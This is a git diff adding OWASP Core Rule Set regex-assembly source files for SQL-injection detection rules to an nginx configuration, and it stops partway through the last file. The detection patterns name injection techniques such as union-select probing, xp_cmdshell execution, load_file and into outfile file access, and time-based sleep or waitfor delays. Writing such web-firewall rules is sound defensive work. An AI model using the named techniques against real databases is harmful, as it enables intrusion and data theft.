paths=("lang_corefunc.html" "lang_mathfunc.html" "lang_aggfunc.html"); declare items; for path in "${paths[@]}"; do items+=$(curl https://www.sqlite.org/$path -s | xmllint --html --xpath "//a[contains(@href,'func.html')]/text()" - 2>/dev/null | grep --color=never -Po "^[\w]+(?=\()"); done; echo "$items" | sort | uniq +abs +acos +acosh +asin +asinh +atan +atan2 +atanh +ceil +ceiling +changes +char +coalesce +cos +cosh +count +degrees +exp +floor +flooravg +format +glob +group_concat +hex +ifnull +iif +instr +last_insert_rowid +length +like +likelihood +likely +ln +load_extension +log +log10 +log2 +lower +lowerpi +ltrim +max +min +mod +nullif +pi +pow +power +printf +quote +radians +random +randomblob +replace +round +rtrim +sign +sin +sinh +soundex +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_offset +sqlite_source_id +sqlite_version +sqrt +substr +substring +sum +tan +tanh +total +total_changes +trim +trunc +typeof +unicode +unlikely +upper +zeroblob + +##! Generic SQL functions +##! +##! Note: May contain overlap with the generated DBMS specific lists, but this guarantees +##! A minimum level of protection, even if one of the one-liners creates an unusual set. +##! Duplicates do not effect the final result of regexp-assemble. +abs +acos +avg +bin +cast +count +date +day +default +field +floor +format +hour +char +charset +chr +if +in +last +length +ln +local +log +max +min +minute +mod +month +now +password +pi +power +repeat +replace +reverse +right +round +second +sign +sleep +sum +tan +time +upper +user +values +version +week +year diff --git a/nginx/config/owasp-crs/regex-assembly/942151.ra b/nginx/config/owasp-crs/regex-assembly/942151.ra new file mode 100644 index 00000000..611a28a1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942151.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-function-names diff --git a/nginx/config/owasp-crs/regex-assembly/942152.ra b/nginx/config/owasp-crs/regex-assembly/942152.ra new file mode 100644 index 00000000..611a28a1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942152.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-function-names diff --git a/nginx/config/owasp-crs/regex-assembly/942170.ra b/nginx/config/owasp-crs/regex-assembly/942170.ra new file mode 100644 index 00000000..6a24a484 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942170.ra @@ -0,0 +1,25 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define one_or_more_whitespace \s+ +##!> define select_or_terminate (?:select|;){{one_or_more_whitespace}} + +##!> assemble + + ##! benchmark may be used to time how quickly MySQL processes the expression + {{select_or_terminate}}benchmark + + ##! conditional select + {{select_or_terminate}}if + + ##! sleep function + {{select_or_terminate}}sleep + ##!=> + + ##! function parameters + \s*?\(\s*?\(?\s*?\w+ + + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942180.ra b/nginx/config/owasp-crs/regex-assembly/942180.ra new file mode 100644 index 00000000..d684e706 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942180.ra @@ -0,0 +1,62 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define open-comment (?:/\*) +##!> define quotes [\"'`] +##!> define quotes-plus-digits [\d\"'`] +##!> define comment-suffix (?:--|#|{{open-comment}}|\{) +##! PB: Should comment-suffix also include "\*/" ? + +##!> define logical-operators or|xor|and +##!> define math-operators div +##!> define comparison-operators like|between +##!> define math-symbols [+<>=(),-] + +{{open-comment}}+{{quotes}}+\s?{{comment-suffix}}? + +##!> assemble + {{quotes}}\s* + ##!=> + ##! logical operators + or + xor + and + + ##! math operators + div + + ##! comparison operators + like + between + ##!=> + [\w\s-]+{{math-symbols}}\s*{{quotes-plus-digits}} + ##!=> +##!< + + +##!> assemble + {{quotes}} + ##!=> + [<>~]+ + \s*[^\w\s]?=\s* + \W*?[+=]+\W*? + ##!=> + {{quotes}} +##!< + +##!> assemble + {{quotes}} + ##!=> + \s*[!=|][\d\s!=+-]+.*?[\"'`(].*?$ + \s*[!=|][\d\s!=]+.*?\d+$ + \s*(?:like|print)\W+[\w\"'`(] + \s*; +##!< + +\d{{quotes}}\s+{{quotes}}\s+\d +^admin\s*?{{quotes}} +[\"'`\(\s]\s*?glob\W+[\w\"'`(] +\sis\s*?0\W +where\s[\s\w\.,-]+\s= diff --git a/nginx/config/owasp-crs/regex-assembly/942190.ra b/nginx/config/owasp-crs/regex-assembly/942190.ra new file mode 100644 index 00000000..9353b13d --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942190.ra @@ -0,0 +1,61 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define quotes [\"'`] + +##!> assemble + {{quotes}} + ##!=> + \s*!\s*[\"'`\w] + ##!> assemble + ;?\s* + ##!=> + having + select + ##!> assemble + union\b\s* + ##!=> + all + distinct + select + ##!< + ##!=> + \b\s*[^\s] + ##!< +##!< + +##!> assemble + \b + ##!=> + ##!> assemble + connection_id + current_user + database + schema + user + ##!=> + \s*?\( + ##!< + + exec\s+master\. + execute\s+master\. + from\W+information_schema\W + ##!> assemble + into[\s+]+ + ##!=> + dumpfile + outfile + ##!=> + \s*?{{quotes}} + ##!< + + select.*?\w?user\( + union\sselect\s@ + union[\w(\s]*?select +##!< + +\s*?exec.*?\Wxp_cmdshell +\s*?execute.*?\Wxp_cmdshell +\Wiif\s*?\( diff --git a/nginx/config/owasp-crs/regex-assembly/942200.ra b/nginx/config/owasp-crs/regex-assembly/942200.ra new file mode 100644 index 00000000..0d0c35dd --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942200.ra @@ -0,0 +1,40 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define punctuation-hexnumbers ,.*?[)\da-f\"'`] + +##!> define ticks [\"'`] + +##!> define spaces \s*?\(\s*?space\s*?\( + +##! Main assembly +##!> assemble + {{punctuation-hexnumbers}}{{ticks}} + ##!=> + {{ticks}}.*?{{ticks}} + (?:\r?\n)?\z + [^\"'`]+ + ##!=> +##!< + +\Wselect.+\W*?from + +##!> assemble + alter + create + delete + desc + drop + insert + load + rename + select + truncate + update + ##!=> + {{spaces}} + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942210.ra b/nginx/config/owasp-crs/regex-assembly/942210.ra new file mode 100644 index 00000000..dfad3266 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942210.ra @@ -0,0 +1,109 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Looking for patterns like: +##! between[\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] + +##!> assemble + && + \|\| + and + between + div + like + nand + not + or + xor + xxor + ##!=> + + [\s(]+\w+[\s)]*?[!=+]+[\s\d]*?[\"'`=()] +##!< + + +##! Looking for patterns like: +##! \d\s*?between\s*?\d+\s*?[\-+] + +##!> assemble + \d\s*? + ##!=> + + and + between + div + like + or + xor + ##!=> + + \s*?\d+\s*?[\-+] +##!< + +##! Looking for a variation of the pattern above: +\d\s+group\s+by.+\( + + +##! Looking for patterns like: +##! \/\w+;?\s+between\W + +##!> assemble + \/\w+;?\s+ + ##!=> + + and + between + div + having + like + or + select + xor + ##!=> + + \W +##!< + + +##! Looking for patterns like: +##! ;\s*?drop +##! #\s*?alter +##! --\s*?drop + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + alter + drop + ##!=> +##!< + + +##! Looking for patterns like: +##! ;\s*?update\s*?\w{2,} +##! #\s*?insert\s*?\w{2,} +##! --\s*?update\s*?\w{2,} + +##!> assemble + ;\s*? + #\s*? + --\s*? + ##!=> + + insert + update + ##!=> + + \s*?\w{2,} + ##!=> +##!< + + +##! Looking for these unique patterns: +@.+=\s*?\(\s*?select +[^\w]SET\s*?@\w+ diff --git a/nginx/config/owasp-crs/regex-assembly/942230.ra b/nginx/config/owasp-crs/regex-assembly/942230.ra new file mode 100644 index 00000000..7c0dafd0 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942230.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\s()]case\s+when.*?then +\)\s*?like\s*?\( +select.*?having\s*?[^\s]+\s*?[^\w\s] +if\s?\(\w+\s*?[=<>~] diff --git a/nginx/config/owasp-crs/regex-assembly/942240.ra b/nginx/config/owasp-crs/regex-assembly/942240.ra new file mode 100644 index 00000000..fd42ddd1 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942240.ra @@ -0,0 +1,32 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers +##!> define alter alter\s*?\w+.*? + +##!> define set \s+set\s+\w+ + +##!> define ticks [\"'`] + +##!> define waitfor \s*?waitfor\s+ + +##! Main assembly +##!> assemble + {{alter}} + ##!=> + char + character + ##!=> + {{set}} +##!< + +##!> assemble + {{ticks}} + ##!=> + ;*?{{waitfor}}time\s+[\"'`] + ;*?{{waitfor}}delay\s+[\"'`] + ;.*?:\s*?goto + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942260.ra b/nginx/config/owasp-crs/regex-assembly/942260.ra new file mode 100644 index 00000000..10fa4766 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942260.ra @@ -0,0 +1,31 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define quotes [\"'`] + + +##!> assemble + {{quotes}}\s*? + ##!=> + and + nand + or + xor + xxor + div + like + between + not + \|\| + && + ##!=> + \s+[\s\w]+=\s*?\w+\s*?having\s+ + ##!=> +##!< + +\w\s+like\s+{{quotes}} +like\s*?{{quotes}}\% +{{quotes}}\s*?like\W*?[\"'`\d] +select\s+?[\[\]()\s\w\.,\"'`-]+from\s+ diff --git a/nginx/config/owasp-crs/regex-assembly/942280.ra b/nginx/config/owasp-crs/regex-assembly/942280.ra new file mode 100644 index 00000000..0d07e85b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942280.ra @@ -0,0 +1,20 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define optional_whitespace \s*? + +##! The following part is going to be appended +##! to match the end of a query or a comment syntax +##!> define terminators (?:[#;{]|\/\*|--) + +##! In PostgreSQL, you can use the pg_sleep() function +##! to delay execution for a given number of seconds +select{{optional_whitespace}}pg_sleep + +##! WAITFOR DELAY blocks the execution until a time interval elapses +waitfor{{optional_whitespace}}delay\s?[\"'`]+\s?\d + +##! SHUTDOWN immediately stops SQL Server +;{{optional_whitespace}}shutdown{{optional_whitespace}}{{terminators}} diff --git a/nginx/config/owasp-crs/regex-assembly/942290.ra b/nginx/config/owasp-crs/regex-assembly/942290.ra new file mode 100644 index 00000000..2966c2ee --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942290.ra @@ -0,0 +1,41 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define operator_syntax_start \[?\$ +##!> define operator_syntax_end \]? + +##!> assemble + {{operator_syntax_start}} + ##!=> + ne + eq + lt + lte + ni + nin + mod + all + size + exists + type + slice + or + xor + nor + div + like + between + and + nor + not + regex + text + where + jsonSchema + elemMatch + ##!=> + {{operator_syntax_end}} + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942300.ra b/nginx/config/owasp-crs/regex-assembly/942300.ra new file mode 100644 index 00000000..bf427521 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942300.ra @@ -0,0 +1,60 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> define required-spaces-plus-sql-function-call \s+\w+\( +##!> define quotes [\"'`] +##!> define start-comment \/\*! +##!> define lazy-optional-spaces \s*? +##!> define lazy-optional-spaces-with-numbers {{lazy-optional-spaces}}\d+{{lazy-optional-spaces}} +##!> define lazy-optional-spaces-numeric-function-call {{lazy-optional-spaces}}\({{lazy-optional-spaces}}\d +##!> define lazy-optional-spaces-plus-sql-function-call {{lazy-optional-spaces}}\w+\( + +\){{lazy-optional-spaces}}when{{lazy-optional-spaces-with-numbers}}then + +##!> assemble + {{quotes}}{{lazy-optional-spaces}} + ##!=> + # + -- + { +##!< + +{{start-comment}}\s?\d+ + +##!> assemble + \b + ##!=> + + ##!> assemble + binary + char + chr + ##!=> + {{lazy-optional-spaces-numeric-function-call}} + ##!< + + ##!> assemble + and + nand + or + xor + xxor + div + like + between + not + regexp + rlike + ##!=> + {{required-spaces-plus-sql-function-call}} + ##!< +##!< + +##!> assemble + \|\| + && + ##!=> + {{lazy-optional-spaces-plus-sql-function-call}} +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942310.ra b/nginx/config/owasp-crs/regex-assembly/942310.ra new file mode 100644 index 00000000..2040b9e3 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942310.ra @@ -0,0 +1,19 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\(\s*?select\s*?\w+\s*?\( +\*\/from +\+\s*?\d+\s*?\+\s*?@ +\w[\"'`]\s*?(?:[-+=|@]+\s+?)+[\d(] +\w[\"'`]\s*?[-+=|@]+[\d(] +coalesce\s*?\( +@@\w+\s*?[^\w\s] +\W!+[\"'`]\w +[\"'`];\s*?if +[\"'`];\s*?while +[\"'`];\s*?begin +[\"'`][\s\d]+=\s*?\d +order\s+by\s+if\w*?\s*?\( +[\s(]+case\d*?\W.+[tw]hen[\s(] diff --git a/nginx/config/owasp-crs/regex-assembly/942320.ra b/nginx/config/owasp-crs/regex-assembly/942320.ra new file mode 100644 index 00000000..c19b5fa7 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942320.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-mysql-postgresql-procedures-functions.ra diff --git a/nginx/config/owasp-crs/regex-assembly/942321.ra b/nginx/config/owasp-crs/regex-assembly/942321.ra new file mode 100644 index 00000000..c19b5fa7 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942321.ra @@ -0,0 +1,6 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##!> include sql-injection-mysql-postgresql-procedures-functions.ra diff --git a/nginx/config/owasp-crs/regex-assembly/942330.ra b/nginx/config/owasp-crs/regex-assembly/942330.ra new file mode 100644 index 00000000..f1e2ec9d --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942330.ra @@ -0,0 +1,51 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +[\"'`]\s*?\bor\b\s*?[\"'`]?\d +[\"'`]\s*?\bxor\b\s*?[\"'`]?\d +[\"'`]\s*?\bdiv\b\s*?[\"'`]?\d +[\"'`]\s*?\blike\b\s*?[\"'`]?\d +[\"'`]\s*?\bbetween\b\s*?[\"'`]?\d +[\"'`]\s*?\band\b\s*?[\"'`]?\d +\x5cx(?:23|27|3d) +^.?[\"'`]$ +^[\"'`\x5c]*?[\d\"'`]+\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[\d\"'`]+\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\band\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnand\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bxxor\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bdiv\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\blike\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bbetween\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\bnot\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\|\|\b\s*?[\w\"'`][+&!@(),.-] +^[\"'`\x5c]*?[^\"'`]+[\"'`]\s*?\b\&\&\b\s*?[\w\"'`][+&!@(),.-] +[^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w +@\w+\s+and\b\s*?[\"'`\d]+ +@\w+\s+or\b\s*?[\"'`\d]+ +@\w+\s+xor\b\s*?[\"'`\d]+ +@\w+\s+div\b\s*?[\"'`\d]+ +@\w+\s+like\b\s*?[\"'`\d]+ +@\w+\s+between\b\s*?[\"'`\d]+ +@[\w-]+\sand\b\s*?[^\w\s] +@[\w-]+\sor\b\s*?[^\w\s] +@[\w-]+\sxor\b\s*?[^\w\s] +@[\w-]+\sdiv\b\s*?[^\w\s] +@[\w-]+\slike\b\s*?[^\w\s] +@[\w-]+\sbetween\b\s*?[^\w\s] +[^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. +\Winformation_schema +table_name\W diff --git a/nginx/config/owasp-crs/regex-assembly/942340.ra b/nginx/config/owasp-crs/regex-assembly/942340.ra new file mode 100644 index 00000000..385bd844 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942340.ra @@ -0,0 +1,28 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +in\s*?\(+\s*?select +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+regexp\s*?\( +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+sounds\s+like\s*?[\"'`] +(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\s\w+]+[=\d]+x +[\"'`]\s*?\d\s*?-- +[\"'`]\s*?\d\s*?# +[\"'`][\%&<>^=]+\d\s*?= +[\"'`][\%&<>^=]+\d\s*?or +[\"'`][\%&<>^=]+\d\s*?xor +[\"'`][\%&<>^=]+\d\s*?div +[\"'`][\%&<>^=]+\d\s*?like +[\"'`][\%&<>^=]+\d\s*?between +[\"'`][\%&<>^=]+\d\s*?and +[\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] +[\"'`]\s*?is\s*?\d.+[\"'`]?\w +[\"'`]\|?[\w-]{3,}[^\w\s.,]+[\"'`] +[\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] +\bexcept\s+select\b +\bexcept\s+values\s*?\( +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)array\s*\[ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s*!?~ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)[\w]+\s+(?:not\s+)?similar\s+to\s+ +[\"'`]\s*(?i:(?:n?and|x?x?or|div|like|between|not)\s+|(?:\|\||\&\&)\s*)(?:true|false)\b diff --git a/nginx/config/owasp-crs/regex-assembly/942350.ra b/nginx/config/owasp-crs/regex-assembly/942350.ra new file mode 100644 index 00000000..170fbd39 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942350.ra @@ -0,0 +1,30 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +create\s+function\s.+\sreturns + +##!> assemble + + ##! matching the injection start + ;\s*? + + ##!=> + alter + create + delete + desc + drop + insert + load + rename + select + truncate + update + ##!=> + + ##! matching function/object parameters syntax + \b\s*?[\[(]?\w{2,} + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/942360.ra b/nginx/config/owasp-crs/regex-assembly/942360.ra new file mode 100644 index 00000000..62a4b6c8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942360.ra @@ -0,0 +1,140 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +\balter\s+char\b\s*\(? +\balter\s+group_concat\b\s*\(? +\balter\s+load_file\b\s*\(? +\bcreate\s+char\b\s*\(? +\bcreate\s+group_concat\b\s*\(? +\bcreate\s+load_file\b\s*\(? +\bdelete\s+char\b\s*\(? +\bdelete\s+group_concat\b\s*\(? +\bdelete\s+load_file\b\s*\(? +\bdesc\s+char\b\s*\(? +\bdesc\s+group_concat\b\s*\(? +\bdesc\s+load_file\b\s*\(? +\binsert\s+char\b\s*\(? +\binsert\s+group_concat\b\s*\(? +\binsert\s+load_file\b\s*\(? +\bload\s+char\b\s*\(? +\bload\s+group_concat\b\s*\(? +\bload\s+load_file\b\s*\(? +\brename\s+char\b\s*\(? +\brename\s+group_concat\b\s*\(? +\brename\s+load_file\b\s*\(? +\bselect\s+char\b\s*\(? +\bselect\s+group_concat\b\s*\(? +\bselect\s+load_file\b\s*\(? +\btruncate\s+char\b\s*\(? +\btruncate\s+group_concat\b\s*\(? +\btruncate\s+load_file\b\s*\(? +\bupdate\s+char\b\s*\(? +\bupdate\s+group_concat\b\s*\(? +\bupdate\s+load_file\b\s*\(? +\bend\s*?\); +[\s(]load_file\s*?\( +[\"'`]\s+regexp\W +[\"'`\w]\s+as\b\s*[\"'`\w]+\s*\bfrom +^[\W\d]+\s*?create\s+\w+ +^[\W\d]+\s*?delete\s+\w+ +^[\W\d]+\s*?desc\s+\w+ +^[\W\d]+\s*?drop\s+\w+ +^[\W\d]+\s*?insert\s+\w+ +^[\W\d]+\s*?load\s+\w+ +^[\W\d]+\s*?rename\s+\w+ +^[\W\d]+\s*?select\s+\w+ +^[\W\d]+\s*?truncate\s+\w+ +^[\W\d]+\s*?update\s+\w+ +^[\W\d]+\s*?alter\s*aggregate\b +^[\W\d]+\s*?alter\s*application\s*role\b +^[\W\d]+\s*?alter\s*assembly\b +^[\W\d]+\s*?alter\s*asymmetric\s*key\b +^[\W\d]+\s*?alter\s*audit\b +^[\W\d]+\s*?alter\s*authorization\b +^[\W\d]+\s*?alter\s*availability\s*group\b +^[\W\d]+\s*?alter\s*broker\s*priority\b +^[\W\d]+\s*?alter\s*bufferpool\b +^[\W\d]+\s*?alter\s*certificate\b +^[\W\d]+\s*?alter\s*cluster\b +^[\W\d]+\s*?alter\s*collation\b +^[\W\d]+\s*?alter\s*column\b +^[\W\d]+\s*?alter\s*conversion\b +^[\W\d]+\s*?alter\s*credential\b +^[\W\d]+\s*?alter\s*cryptographic\s*provider\b +^[\W\d]+\s*?alter\s*database\b +^[\W\d]+\s*?alter\s*default\b +^[\W\d]+\s*?alter\s*dimension\b +^[\W\d]+\s*?alter\s*diskgroup\b +^[\W\d]+\s*?alter\s*domain\b +^[\W\d]+\s*?alter\s*endpoint\b +^[\W\d]+\s*?alter\s*extension\b +^[\W\d]+\s*?alter\s*external\b +^[\W\d]+\s*?alter\s*event\b +^[\W\d]+\s*?alter\s*flashback\b +^[\W\d]+\s*?alter\s*foreign\b +^[\W\d]+\s*?alter\s*fulltext\b +^[\W\d]+\s*?alter\s*function\b +^[\W\d]+\s*?alter\s*hierarchy\b +^[\W\d]+\s*?alter\s*group\b +^[\W\d]+\s*?alter\s*histogram\b +^[\W\d]+\s*?alter\s*index\b +^[\W\d]+\s*?alter\s*indextype\b +^[\W\d]+\s*?alter\s*inmemory\b +^[\W\d]+\s*?alter\s*instance\b +^[\W\d]+\s*?alter\s*java\b +^[\W\d]+\s*?alter\s*language\b +^[\W\d]+\s*?alter\s*large\b +^[\W\d]+\s*?alter\s*library\b +^[\W\d]+\s*?alter\s*lockdown\b +^[\W\d]+\s*?alter\s*logfile\s*group\b +^[\W\d]+\s*?alter\s*login\b +^[\W\d]+\s*?alter\s*mask\b +^[\W\d]+\s*?alter\s*master\s*key\b +^[\W\d]+\s*?alter\s*materialized\b +^[\W\d]+\s*?alter\s*message\s*type\b +^[\W\d]+\s*?alter\s*method\b +^[\W\d]+\s*?alter\s*module\b +^[\W\d]+\s*?alter\s*nickname\b +^[\W\d]+\s*?alter\s*operator\b +^[\W\d]+\s*?alter\s*outline\b +^[\W\d]+\s*?alter\s*package\b +^[\W\d]+\s*?alter\s*partition\b +^[\W\d]+\s*?alter\s*permission\b +^[\W\d]+\s*?alter\s*procedure\b +^[\W\d]+\s*?alter\s*profile\b +^[\W\d]+\s*?alter\s*queue\b +^[\W\d]+\s*?alter\s*remote\b +^[\W\d]+\s*?alter\s*resource\b +^[\W\d]+\s*?alter\s*role\b +^[\W\d]+\s*?alter\s*rollback\b +^[\W\d]+\s*?alter\s*route\b +^[\W\d]+\s*?alter\s*schema\b +^[\W\d]+\s*?alter\s*search\b +^[\W\d]+\s*?alter\s*security\b +^[\W\d]+\s*?alter\s*server\b +^[\W\d]+\s*?alter\s*service\b +^[\W\d]+\s*?alter\s*sequence\b +^[\W\d]+\s*?alter\s*session\b +^[\W\d]+\s*?alter\s*symmetric\s*key\b +^[\W\d]+\s*?alter\s*synonym\b +^[\W\d]+\s*?alter\s*stogroup\b +^[\W\d]+\s*?alter\s*table\b +^[\W\d]+\s*?alter\s*tablespace\b +^[\W\d]+\s*?alter\s*text\b +^[\W\d]+\s*?alter\s*threshold\b +^[\W\d]+\s*?alter\s*trigger\b +^[\W\d]+\s*?alter\s*trusted\b +^[\W\d]+\s*?alter\s*type\b +^[\W\d]+\s*?alter\s*usage\b +^[\W\d]+\s*?alter\s*user\b +^[\W\d]+\s*?alter\s*view\b +^[\W\d]+\s*?alter\s*work\b +^[\W\d]+\s*?alter\s*workload\b +^[\W\d]+\s*?alter\s*wrapper\b +^[\W\d]+\s*?alter\s*xml\s*schema\b +^[\W\d]+\s*?alter\s*xsrobject\b +^[\W\d]+\s*?union\s*all\b +^[\W\d]+\s*?union\s*select\b +^[\W\d]+\s*?union\s*distinct\b diff --git a/nginx/config/owasp-crs/regex-assembly/942362.ra b/nginx/config/owasp-crs/regex-assembly/942362.ra new file mode 100644 index 00000000..f0461e33 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/942362.ra @@ -0,0 +1,171 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!+ i + +##! Helpers + +##!> define nonword_number ^[\W\d]+\s*? + +##!> define cmd_alter alter +##!> define cmd_create create +##!> define cmd_delete delete +##!> define cmd_desc desc +##!> define cmd_insert insert +##!> define cmd_load load +##!> define cmd_rename rename +##!> define cmd_select select +##!> define cmd_truncate truncate +##!> define cmd_update update +##!> define cmd_drop drop +##!> define cmd_union union + +##!> define seq_char \s+char\s?\(? +##!> define seq_group_concat \s+group_concat\s?\(? +##!> define seq_load_file \s+load_file\s?\(? + +##! Main assembly +##!> assemble + ##!> assemble + {{cmd_alter}} + {{cmd_create}} + {{cmd_delete}} + {{cmd_desc}} + {{cmd_insert}} + {{cmd_load}} + {{cmd_rename}} + {{cmd_select}} + {{cmd_truncate}} + {{cmd_update}} + ##!=> + {{seq_char}} + {{seq_group_concat}} + {{seq_load_file}} + ##!< + + end\s*?\); + [\s(]load_file\s*?\( + [\"'`]\s+regexp\W + [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom + + ##!> assemble + {{nonword_number}} + ##!=> + {{cmd_create}}\s+\w+ + {{cmd_delete}}\b + {{cmd_desc}}\b + {{cmd_drop}}\b + {{cmd_insert}}\b + {{cmd_load}}\b + {{cmd_rename}}\b + {{cmd_select}}\b + {{cmd_truncate}}\b + {{cmd_update}}\b + ##!> assemble + {{cmd_alter}}\s* + ##!=> + aggregate + application\s*role + assembly + asymmetric\s*key + audit + authorization + availability\s*group + broker\s*priority + bufferpool + certificate + cluster + collation + column + conversion + credential + cryptographic\s*provider + database + default + dimension + diskgroup + domain + endpoint + extension + external + event + flashback + foreign + fulltext + function + hierarchy + group + histogram + index + indextype + inmemory + instance + java + language + large + library + lockdown + logfile\s*group + login + mask + master\s*key + materialized + message\s*type + method + module + nickname + operator + outline + package + partition + permission + procedure + profile + queue + remote + resource + role + rollback + route + schema + search + security + server + service + sequence + session + symmetric\s*key + synonym + stogroup + table + tablespace + text + 